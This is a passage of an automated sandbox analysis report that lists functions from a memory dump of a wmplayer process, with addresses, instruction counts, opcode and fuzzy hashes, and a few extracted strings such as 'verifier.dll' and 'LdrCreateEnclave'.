                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: verifier.dll
                                              • API String ID: 0-3265496382
                                              • Opcode ID: 59f9d8fcea5270ba920ccf6db8923e08880a6f95bc912e29bee2a0df2e52edb1
                                              • Instruction ID: ceba4c301b69cb131cceee910faff9e20906d985a12ba3ba30a0d70b84201718
                                              • Opcode Fuzzy Hash: 59f9d8fcea5270ba920ccf6db8923e08880a6f95bc912e29bee2a0df2e52edb1
                                              • Instruction Fuzzy Hash: DA316176A10301DFDB24DF29D8D0F26B6E9EB49712F598479F905DF281E7719C808790
                                              Function 0337705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: kLsE
                                              • API String ID: 0-3058123920
                                              • Opcode ID: 50395fd7eb2ce792c95ddece0c205044d6907d114aa08d8c6dec44035d18d449
                                              • Instruction ID: cbd35f9fd94a3f60fd45310f145f1e699319772ceb3b895dd1a3227bf6e5e8a2
                                              • Opcode Fuzzy Hash: 50395fd7eb2ce792c95ddece0c205044d6907d114aa08d8c6dec44035d18d449
                                              • Instruction Fuzzy Hash: 844149315213518BE731FB64ECCAB79BBA8AB40724F1C0529EC509E1C9CBBCA4C5C790
                                              Function 033036EF Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Flst
                                              • API String ID: 0-2374792617
                                              • Opcode ID: 8e9ed2146eae3cffbf46d36f63712de1b8dd0ce6d7744cc5eb77939195d0aa5c
                                              • Instruction ID: 4775dcc4a49a80f3e962bd1f8e24b1539d01b1d2bf647657bd24d21a0188ca86
                                              • Opcode Fuzzy Hash: 8e9ed2146eae3cffbf46d36f63712de1b8dd0ce6d7744cc5eb77939195d0aa5c
                                              • Instruction Fuzzy Hash: 70419AB96053019FC314CF18C5D0A26FBE8EB49B24F18856EE459CF281EB71D982CB92
                                              Function 032C9730 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: L4CwL4Cw
                                              • API String ID: 0-1654103815
                                              • Opcode ID: e8c666214aff2c0d767c3e5e3895e2fee8071ca2b5dd1d3811ba6995d65a2262
                                              • Instruction ID: 8bdb7b5bc28e98da868a97cb5d538d98ecc6b8153091afdd4e3f8cee307c0611
                                              • Opcode Fuzzy Hash: e8c666214aff2c0d767c3e5e3895e2fee8071ca2b5dd1d3811ba6995d65a2262
                                              • Instruction Fuzzy Hash: C421D67A6317909FC322EF188840B5ABBB8FB84B50F15052DE5559F340D7B0EC84CB90
                                              Function 032D5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: de6fa1abbd1ee365998a642a195bca63e935fceaaa129f79cf37bcb4a9184da6
                                              • Instruction ID: ce610ac7817455182388dadc487b1d777d2247493cdc5aa1cc28869951714b23
                                              • Opcode Fuzzy Hash: de6fa1abbd1ee365998a642a195bca63e935fceaaa129f79cf37bcb4a9184da6
                                              • Instruction Fuzzy Hash: C911B9303345038BEB24C91DA850636B399EB8B655F3C812BE492CB790D7F2DCC18780
                                              Function 0335106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrCreateEnclave
                                              • API String ID: 0-3262589265
                                              • Opcode ID: 1254498780d84752cd71791f980b1c94e00db63b6983a72054839abf6e461273
                                              • Instruction ID: c9e676310655349e391c1c55fc0b9f800a0e231a282c1569b28c31e6fa8a40a2
                                              • Opcode Fuzzy Hash: 1254498780d84752cd71791f980b1c94e00db63b6983a72054839abf6e461273
                                              • Instruction Fuzzy Hash: 2E2138B19283449FC310DF1AC885A9BFBE8FBD5B50F004A1EF99097250DBB09544CB92
                                              Function 0332739A Relevance: .7, Instructions: 705COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe23e4ac6ed614445a54a66e7baaa0721307e5f9d1e8968a3937aa634c142d9c
                                              • Instruction ID: 5fb0f02079a5fdd20da0a4cb33093cff4550ee9e3bd34ed4c6f0b260e85fce6e
                                              • Opcode Fuzzy Hash: fe23e4ac6ed614445a54a66e7baaa0721307e5f9d1e8968a3937aa634c142d9c
                                              • Instruction Fuzzy Hash: A042B375A006268FDB18CF59C8D1ABEFBB6FF88314B28855DD552AB341D734E842CB90
                                              Function 032FB2C0 Relevance: .6, Instructions: 629COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 949f3381fe76e19b8ab115b2f619e244f02ebf9f928a3073bd45546dc90d426d
                                              • Instruction ID: 98abff3dbd781279a3264195a7b741a98274973f4168e02104e9ab03261bcbf8
                                              • Opcode Fuzzy Hash: 949f3381fe76e19b8ab115b2f619e244f02ebf9f928a3073bd45546dc90d426d
                                              • Instruction Fuzzy Hash: C9329B76E202199FCF14CFA8C990BAEFBB5FF44714F184029E905AB390E7759991CB90
                                              Function 0337A118 Relevance: .6, Instructions: 591COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a8035edef52ffdb4dc4d7269c9a6ba5ce1627d2d6aa22e3ef4371d08d1f3e40c
                                              • Instruction ID: 921e0e343de64d6997a3311b445f7f3734caee757fd73b3edc58b0e8fd17cc44
                                              • Opcode Fuzzy Hash: a8035edef52ffdb4dc4d7269c9a6ba5ce1627d2d6aa22e3ef4371d08d1f3e40c
                                              • Instruction Fuzzy Hash: BC22CE742046918BEB34CF29C8D437AB7F5AF44340F08849AE8968F785E73DE492DB60
                                              Function 033916CC Relevance: .6, Instructions: 571COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bcd6eff3752e917a2cfa9cc5e4c03fec7fcbb4a152a941e57649afabbc06c506
                                              • Instruction ID: a1126e9f7660229a44ce28c33a5929793b2c27f290ad6dc56dcefe91b50e6e3a
                                              • Opcode Fuzzy Hash: bcd6eff3752e917a2cfa9cc5e4c03fec7fcbb4a152a941e57649afabbc06c506
                                              • Instruction Fuzzy Hash: BA228235E00216CFEF19CF58C8D06AAF7B6BF89314B1845AED856AB345DB34E941CB90
                                              Function 032C8397 Relevance: .4, Instructions: 380COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0d7ba174c19d28662fdb418908caf6b4f2e0e5e54108972533cc7d46907fa535
                                              • Instruction ID: 2f9da417a7652714d34f86a63f47de3cbf0fae4dbb9509f223cb17c68c07ac73
                                              • Opcode Fuzzy Hash: 0d7ba174c19d28662fdb418908caf6b4f2e0e5e54108972533cc7d46907fa535
                                              • Instruction Fuzzy Hash: 21D1C375A3076A9BCB14DF64C8C0ABAB7A5BF44304F19872DE915DF280E774E984C790
                                              Function 032DD7E0 Relevance: .3, Instructions: 342COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd22cdb92515d5bae72ed4e1ba6117957215abeb64bbd4ca7e3aa671ce09552f
                                              • Instruction ID: feee919032702b79112d5096d7dd2b5405906e5e1284f626b9295dd3ef7b2327
                                              • Opcode Fuzzy Hash: cd22cdb92515d5bae72ed4e1ba6117957215abeb64bbd4ca7e3aa671ce09552f
                                              • Instruction Fuzzy Hash: 95C1B375E20A169BDB24CF5ACC80BAEF7B5FF45310F18C269D815AB290D775E981CB80
                                              Function 032F90DB Relevance: .3, Instructions: 287COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d3b77589454618cf4391746aeb784888639576a4099d20131259e2a9ed3bdb76
                                              • Instruction ID: 7964a30744cd930493d0f00ea3001e93af922c25061d3c427799f9e25efba3af
                                              • Opcode Fuzzy Hash: d3b77589454618cf4391746aeb784888639576a4099d20131259e2a9ed3bdb76
                                              • Instruction Fuzzy Hash: B4A14975910215AFEB16EF64CC81BAFB7B9AF46750F454064FA00AF2A0D775EC90CBA0
                                              Function 032D83C0 Relevance: .3, Instructions: 281COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: aaabe43c92b0f67af251f18127cb93015406c7cec4fedc031fdddf1c4a3aec8e
                                              • Instruction ID: 545819580458a5b69a09310783e86cc789f4d817f9787060a0b6a27b9caa5b5a
                                              • Opcode Fuzzy Hash: aaabe43c92b0f67af251f18127cb93015406c7cec4fedc031fdddf1c4a3aec8e
                                              • Instruction Fuzzy Hash: BCC168746183418FD764DF19C484BABB7E9FF88304F48896DE9898B290D774E948CF92
                                              Function 03310185 Relevance: .3, Instructions: 276COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4dd8738689cb58e0b259bd18078776d7b89a3b7bccd3f75e32ab4ed41e1fdbce
                                              • Instruction ID: 1076b1ccdb7dcec551a5c2468d6d7708cc04d56eccb038dec759ec2a185c747e
                                              • Opcode Fuzzy Hash: 4dd8738689cb58e0b259bd18078776d7b89a3b7bccd3f75e32ab4ed41e1fdbce
                                              • Instruction Fuzzy Hash: 8BA1AF74B007159FDB2CDF66C9D0BAAB7F9FF44314F044129EA459B281DB38A8A2DB50
                                              Function 032EE3F0 Relevance: .3, Instructions: 261COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6e8bd759248b6573662290dbcc6a56875d76a1805130e0b2ba2ed84a9db49442
                                              • Instruction ID: 6f48315b3e40f0ed5df6ddd165eafb8edb24288c892645917eddd9fb714699f8
                                              • Opcode Fuzzy Hash: 6e8bd759248b6573662290dbcc6a56875d76a1805130e0b2ba2ed84a9db49442
                                              • Instruction Fuzzy Hash: A1913636A20715CBDB24EB58C882B7EB7A5EF85710F4A8169E8159F340E7B4DD81C760
                                              Function 032D1131 Relevance: .3, Instructions: 259COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9db884a544e0ca916021b60e6cc74c485c9fcbd88720c597a40a39effbd82083
                                              • Instruction ID: 706e57b01bcbef131aa75e04067617ccfdadde57bcda14122b30e32697f76d62
                                              • Opcode Fuzzy Hash: 9db884a544e0ca916021b60e6cc74c485c9fcbd88720c597a40a39effbd82083
                                              • Instruction Fuzzy Hash: 53B10275A183508FD354CF28C980A5AFBF1BF88704F18496EE899DB351D371E985CB82
                                              Function 032FD090 Relevance: .2, Instructions: 217COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                              • Instruction ID: 5964897e0f2c5a6d80a602f5162e692aa9f737dd7d4b88665fc41fd022da686b
                                              • Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
                                              • Instruction Fuzzy Hash: 5781A977E112198FDF14DF68C8C07AEF7B2EB85704F19816AC816BB358D631A980CB91
                                              Function 0330E284 Relevance: .2, Instructions: 212COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d35041f4f6ea4eecff11df0ffd99abba6f9a0c704713a01a7c29a5a5eaa9acea
                                              • Instruction ID: e60fbd9727c9723c343102f60e23d893ed415f56b3aeb9aa78cfb2d8ededba80
                                              • Opcode Fuzzy Hash: d35041f4f6ea4eecff11df0ffd99abba6f9a0c704713a01a7c29a5a5eaa9acea
                                              • Instruction Fuzzy Hash: D4816C75A00A09AFDB25CFA9C890BEEBBF9FF88310F144869E555A7250D730AC45CB60
                                              Function 032EC640 Relevance: .2, Instructions: 206COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c966b9d56c2482a5825bcf15c8d0389f0fba7bab8f459893db62c374f9be6210
                                              • Instruction ID: d3dffe402661709338f86776334daaf08cec8067b2da559d660790eaee307fbe
                                              • Opcode Fuzzy Hash: c966b9d56c2482a5825bcf15c8d0389f0fba7bab8f459893db62c374f9be6210
                                              • Instruction Fuzzy Hash: 8C71DFB6D25265DBCB25CF98C8917BEFBB8FF49710F18815AE842AB350D3749844CB90
                                              Function 032E260B Relevance: .2, Instructions: 201COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 250e68b10cb417345d2c0ac50581994c2ee3ba1eb359929b013a7d65bce97e29
                                              • Instruction ID: 7393ff7f7f6742c4fead41701ef7c88bced746438fcd5499c6f4884dbe18613f
                                              • Opcode Fuzzy Hash: 250e68b10cb417345d2c0ac50581994c2ee3ba1eb359929b013a7d65bce97e29
                                              • Instruction Fuzzy Hash: BF71F575624342DFC311EF28C481B66B7E9FF84310F4989A9E85ACB351DB74D885CB91
                                              Function 0335035C Relevance: .2, Instructions: 198COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                              • Instruction ID: e4fb67c0c33261067e476996af4ab19f72db25691148fcd1c130bef1d9be738a
                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                              • Instruction Fuzzy Hash: CD719A75E00619AFCB14DFA9C984EEEBBB8FF48300F144469E905AB250DB34EA41CB90
                                              Function 033662A0 Relevance: .2, Instructions: 198COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ec5789cca0ea5eef60556e8e3afa57853d78c86213f4018c1773fa08bed70944
                                              • Instruction ID: 399f730524c18e53d92477dbdbba3d4bd2db54fb905960245feee1dc14bae4a0
                                              • Opcode Fuzzy Hash: ec5789cca0ea5eef60556e8e3afa57853d78c86213f4018c1773fa08bed70944
                                              • Instruction Fuzzy Hash: B6710536200701AFDB32DF14CCC6F56B7B9EF84790F298918E2568B6A4D775E984CB50
                                              Function 0339132D Relevance: .2, Instructions: 188COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e569e8bc3cd17a85403f8ba54b78af951bd8cf64115964263175959ec721122b
                                              • Instruction ID: 95607d0375670c751a41c5f07bf0e124cbf6d1b6d733a37d354efb2d4481c964
                                              • Opcode Fuzzy Hash: e569e8bc3cd17a85403f8ba54b78af951bd8cf64115964263175959ec721122b
                                              • Instruction Fuzzy Hash: 49814D75A00246DFDB09CF68C590AAEB7F1FF48300F1981AAD859EB355D734EA51CB90
                                              Function 0339903E Relevance: .2, Instructions: 186COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e1883c8612b6bf2b95762035f7821742c511562d70f1cfe8bf701e5ae4ba3a6f
                                              • Instruction ID: c30714617ce866a2bcdb8339ca7800206d152c16f304d94e342ffd2d44af16bd
                                              • Opcode Fuzzy Hash: e1883c8612b6bf2b95762035f7821742c511562d70f1cfe8bf701e5ae4ba3a6f
                                              • Instruction Fuzzy Hash: BC61AF79600715EFEB15DF65C8C4BABBBA9FF48710F04461EE8A98B240DB34E914CB91
                                              Function 032D7703 Relevance: .2, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1dd8dd80008d7a9d7ac6f78dca686f7dc4696b076cefee82afa2ab0b18b4487d
                                              • Instruction ID: 23a6132e5e8770967d477c841094d1b93ecc208c05eeab98c9d6a4efeea60a3b
                                              • Opcode Fuzzy Hash: 1dd8dd80008d7a9d7ac6f78dca686f7dc4696b076cefee82afa2ab0b18b4487d
                                              • Instruction Fuzzy Hash: BB614075E10606EFDB18DF6CD480AADFBB5BF48200F18856AD41AE7350DB74A981CB90
                                              Function 033992A6 Relevance: .2, Instructions: 174COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4e50bdff151d3a84037d7c92d346e40309e8961c15fb92cb718894489f6f0877
                                              • Instruction ID: 716ea3cc831293eab38a52cb24793463c3571b9ad02e35bd4cb77e2be6b8a61c
                                              • Opcode Fuzzy Hash: 4e50bdff151d3a84037d7c92d346e40309e8961c15fb92cb718894489f6f0877
                                              • Instruction Fuzzy Hash: 5D61F035604742CBEB15CF68C8D4B6AF7E4BF84704F18446EE8858F691DB35E845CB81
                                              Function 032CB2D3 Relevance: .2, Instructions: 161COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f13b846ee39ee24231919d8f27a7e2fc821c021d83e05597b4960ce108b11061
                                              • Instruction ID: 3479463cf7058693f633c529fde90f53403d496d77bf409db13b50a3f391af7e
                                              • Opcode Fuzzy Hash: f13b846ee39ee24231919d8f27a7e2fc821c021d83e05597b4960ce108b11061
                                              • Instruction Fuzzy Hash: 46414635630740EFCB25EF25D892B6AB7A9EF44760F19866DE5099F290D7B0DC80CB90
                                              Function 032E3740 Relevance: .2, Instructions: 159COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fce0f932cd367e1ef92b2bbd1fa2cd542d8936619aa8925091b3ea99d373ed43
                                              • Instruction ID: e718ec58d4da50bd91b0bf6e64a963c0c36e0abbd33bc954566507c676e1d619
                                              • Opcode Fuzzy Hash: fce0f932cd367e1ef92b2bbd1fa2cd542d8936619aa8925091b3ea99d373ed43
                                              • Instruction Fuzzy Hash: DF511179A20616AFC311CF68D8826A9B7B4FF04711F8982A9E845DB340E774E9D1CBD0
                                              Function 032D7152 Relevance: .2, Instructions: 158COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 608b0df848230a79a795cec820a6aed12d558371e004fb1172c5e070ba59b9ab
                                              • Instruction ID: bc605c7f9a5cd45ffa55b8a2285843c58035fee6d7b4778423d989e3d143d784
                                              • Opcode Fuzzy Hash: 608b0df848230a79a795cec820a6aed12d558371e004fb1172c5e070ba59b9ab
                                              • Instruction Fuzzy Hash: 0651E335E20606EFDB15EF68C884BADB7B8FF05711F188169E51297290DBB8D941CB90
                                              Function 0339D26B Relevance: .2, Instructions: 153COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                              • Instruction ID: 685b67bd5fcee17347584a33165d60976ccc24bcb23e06639907c30e2552cd0c
                                              • Opcode Fuzzy Hash: e34a641792a2e79be6bf0067dfbea21fe876c0422c27924c31e583a14ba6783b
                                              • Instruction Fuzzy Hash: BC513A76608342DFEB11CF68C8C1B5AB7E9FB88244F04892EF9959B244DB34E945CB52
                                              Function 032D51ED Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0feba79580ac223f608189d74751c2c5a74c13132f567f638a08516bdf276318
                                              • Instruction ID: 89c62928aab6105eeb4af95e12363429a976d48bab7cf3ec827c85ab654acea9
                                              • Opcode Fuzzy Hash: 0feba79580ac223f608189d74751c2c5a74c13132f567f638a08516bdf276318
                                              • Instruction Fuzzy Hash: 58519035A21315DFDF61DBA8C880BEDB3B8BF06714F284059E452EB250D7F4A880CB51
                                              Function 0330F71F Relevance: .1, Instructions: 143COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7dd0d12aff6ca04da5574ca609a4fdad3a10aa0e7cda7444315b00be8b46746f
                                              • Instruction ID: da547ff4cc7c1bda08ff408c4e697e766008fcc09d72d26a0f5369b23620d477
                                              • Opcode Fuzzy Hash: 7dd0d12aff6ca04da5574ca609a4fdad3a10aa0e7cda7444315b00be8b46746f
                                              • Instruction Fuzzy Hash: 8F41D87AD04229ABCB21EBA88CC0ABFF7BCAF05694F454166F900EB200D734DD4087E5
                                              Function 033001F8 Relevance: .1, Instructions: 138COMMON
                                              Download Yara Rule
                                              Memory Dump Source
